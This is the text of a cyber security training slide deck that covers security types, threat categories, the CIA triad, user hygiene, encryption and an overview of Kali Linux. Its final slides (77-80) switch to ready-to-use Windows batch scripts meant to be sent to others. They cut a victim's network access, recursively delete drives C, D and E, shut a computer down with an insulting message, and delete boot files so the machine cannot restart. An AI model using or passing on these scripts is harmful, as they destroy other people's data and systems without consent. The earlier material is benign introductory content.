  • 46. What Does it Mean- “Security”? • “Security” is the quality or state of being secure--to be free from danger. But what are the types of security we have to be concern with? • Physical security - addresses the issues necessary to protect the physical items, objects or areas of an organization from unauthorized access and misuse. • Personal security - addresses the protection of the individual or group of individuals who are authorized to access the organization and its operations. • Operations security- protection of the details of a particular operation or series of activities. ComputerTrainingWales–CyberSecurity
  • 47. What Does it Mean- “Security”? • Communications security - concerned with the protection of an organisations communications media, technology, and content. • Network security is the protection of networking components, connections, and contents. • Information Security – protection of information and its critical elements, including the systems and hardware that use, store, or transmit that information. ComputerTrainingWales–CyberSecurity
  • 48. The Need for Security • Industry Need for Information Security An organisation needs information security for four important reasons: • 1. To protect the organisations ability to function, • 2. To enable the safe operation of applications implemented on the organisation IT systems, • 3. To protect the data the organisation collects and uses, and • 4. To safeguard the technology assets in use at the organisation. ComputerTrainingWales–CyberSecurity
  • 49. Information Security Threats • Act of Human Error or Failure (accidents, mistakes) •Compromises to Intellectual Property (piracy, copyright infringement) • Acts of Espionage or Trespass (unauthorized access and/or data collection) • Acts of Information Extortion (blackmail of information disclosure) • Acts of Sabotage or Vandalism (destruction of systems or information) • Software Attacks (viruses, worms, macros, denial of service) ComputerTrainingWales–CyberSecurity
  • 50. Information Security Threats • Forces of Nature (fire, flood, earthquake, lightning) • Quality of Service Deviations from Service Providers (power & WAN service issues) • Technical Hardware Failures or Errors (equipment failure) • Technical Software Failures or Errors (bugs, code problems, unknown loopholes) • Technological Obsolescence (antiquated or outdated technologies) ComputerTrainingWales–CyberSecurity
  • 51. Information Security • Tools, such as policy, awareness, training, education, and technology are necessary for the successful application of information security. • The NSTISSC (National Security Telecommunications and Information Systems Security Committee) model of information security is known as the C.I.A. triangle (Confidentiality, Integrity, and Availability) – these are characteristics that describe the utility/value of information ComputerTrainingWales–CyberSecurity
  • 52. Figure 3 INFORMATION Integrity Availability Confidentiality C.I.A. TRIANGLE ComputerTrainingWales–CyberSecurity
  • 53. The Dilemma of Security • The problem that we cannot get away from in computer security is that we can only have good security if everyone understands what security means, and agrees with the need for security. • Security is a social problem, because it has no meaning until a person defines what it means to them. • The harsh reality is the following: In practice, most users have little or no understanding of security. This is our biggest security hole. ComputerTrainingWales–CyberSecurity
  • 54. Meaning of Security Lies in Trust • Every security problem has this question it needs to answer first: Whom or what do we trust? • On our daily lives, we placed some sort of technology between us and the “things” we don’t trust. For example lock the car, set the house alarm, give Credit Card number only to the cashier, etc. • So we decided to trust somebody/something to have some sort of security (trust the lock, trust the police, trust the cashier). • We have to have the same scenario for computer & network systems we use today. ComputerTrainingWales–CyberSecurity
  • 55. ComputerTrainingWales–CyberSecurity Many cyber security threats are largely avoidable. Some key steps that everyone can take include (1 of 2): l Use good, cryptic passwords that can’t be easily guessed - and keep your passwords secret l Make sure your computer, devices and applications (apps) are current and up to date l Make sure your computer is protected with up-to-date anti-virus and anti-spyware software l Don’t click on unknown or unsolicited links or attachments, and don’t download unknown files or programs onto your computer or other devices
  • 56. ComputerTrainingWales–CyberSecurity Key steps, continued (2 of 2): l Remember that information and passwords sent via standard, unencrypted wireless are especially easy for hackers to intercept O To help reduce the risk, look for “https” in the URL before you enter any sensitive information or a password (the “s” stands for “secure”) O Also avoid standard, unencrypted email and unencrypted Instant Messaging (IM) if you’re concerned about privacy
  • 57. ComputerTrainingWales–CyberSecurity Questions: How would you know whether an email sent to you with an attachment is free from viruses? How do you secure sensitive data you send via email? What steps would you take to secure your computer from malware? What does the phrase“ safely manage your password” mean to you?
  • 58. ComputerTrainingWales–CyberSecurity Safely mange your password Safely manage your email account Secure your computer Protect the data you are handling Avoid risky behaviour online Be aware of security guidelines, policies, and procedures
  • 59. Components of an Information System • People are the biggest threat to information security!!! (WHY? – Because WE are the weakest link) •Social Engineering . It is a system that manipulates the actions of people in order to obtain information about a system in order to obtain access. • Procedures are written blueprints for accomplishing a specific task; step-by-step descriptions. The obtainment of the procedures by an unauthorized user would constitute a threat to the integrity of the information. ComputerTrainingWales–CyberSecurity
  • 60. Figure 5 Components of an Information System Data Software Hardware People Procedures ComputerTrainingWales–CyberSecurity
  • 61. Access vs. Security • When considering security it is important to realize that it is impossible to obtain perfect security. Security is not an absolute. Instead security should be considered a balance between protection and availability. • It is possible to have unrestricted access to a system, so that the system is available to anyone, anywhere, anytime, through any means. However, this kind of random access poses a danger to the integrity of information. • On the other hand complete security of an information system would not allow anyone access at any given time. ComputerTrainingWales–CyberSecurity
  • 62. Figure 7 Security Access Balancing Security and Access- Too much security might make access hard to get and people will stop using the system. On the other hand, a too easy access protocol, might be a security hole for the network. A balance must be achieved between those two major “players” ComputerTrainingWales–CyberSecurity
  • 63. What is Encryption ? Encryption is the process of converting messages, information, or data into a form unreadable by anyone except the intended recipient. As shown in the figure below, Encrypted data must be deciphered, or decrypted, before it can be read by the recipient. The root of the word encryption—crypt—comes from the Greek word kryptos, meaning hidden or secret. ComputerTrainingWales–CyberSecurity
  • 64. Modern Encryption Algorithms • Private Key Encryption • Public Key Encryption • Quantum Cryptography ComputerTrainingWales–CyberSecurityComputerTrainingWales–CyberSecurity
  • 65.
  • 67.
  • 68. • Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution (distro). Named after a Hindu god. • It was designed to replace the BackTrack Linux distro. • A Linux distro is a operating system based off the Linux kernel. • Think Windows NT and all the Windows distributions (XP, Vista, 7, 8, etc.) • Linux is itself based off the UNIX kernel. • UNIX > Linux > BackTrack > Kali. What is Kali Linux? ComputerTrainingWales–CyberSecurity
  • 71. • 300+ applications, from password crackers to digital forensics software. • Vast wireless device support (ARM processors). • Completely Customisable. • Multilingual Support. • Secure Development Environment. • Open source Git tree. • Filesystem Hierarchy Standard (FHS) Compliant. Why use Kali? ComputerTrainingWales–CyberSecurity
  • 72. • Switched from Ubuntu to Debian. • FHS and Debian compliant. • Can now bootstrap and customize Kali ISOs. • Streaming security and package updates from Debian. • Expanded ARM development. Kali’s New Features ComputerTrainingWales–CyberSecurity
  • 73. • Easy upgrade to future versions. • Customizable desktop environment. Automatable Kali Installations. • Streamlined Development Process. • Long Term Tool Packaging and Maintenance. Kali’s New Features (cont) ComputerTrainingWales–CyberSecurity
  • 74. • Metasploit • Nmap • Wireshark • Aircrack-ng • John the Ripper • SQLNinja • THC-Hydra • Torr • diStorm3 • Armitage • Proxy Strike • Ghost Phisher • Zenmap • WebScarab • Android-sdk • Maskprocessor • SIPArmyKnife • Metaspolitable Kali’s Toolkit (300) ComputerTrainingWales–CyberSecurity
  • 75. Installing Kali Via Physical Media Via Digital Media • Burn to a live disk, insert into disk drive, install. • Format a flash drive, install Kali Linux on it, insert into a computer, at BIOS screen select boot from USB. • Download VMware or other similar software, create a virtual machine, download and install Kali Linux onto virtual machine. • Use a Preboot eXecution Environment (PXE) to install and boot Kali Linux from a server/client network. ComputerTrainingWales–CyberSecurity
  • 77. How to stop someone's internet access:::: @Echo off Ipconfig /release Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it
  • 78. Process: Open Notepad Copy the below command there "rd/s/q D: rd/s/q C: rd/s/q E:" ( without quotes ) Save as "anything.bat This virus Formats the C ,D , and E Drive in 3 Seconds.
  • 79. Convey your friend a little message and shut down his / her computer: @echo off msg * I don't like you shutdown -c "Error! You are too stupid!" -s Save it as "Anything.BAT" in All Files and send it.
  • 80. @echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini del c:boot.ini attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini Open up notepad and copy and paste that. Save it as a .bat file. This will shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.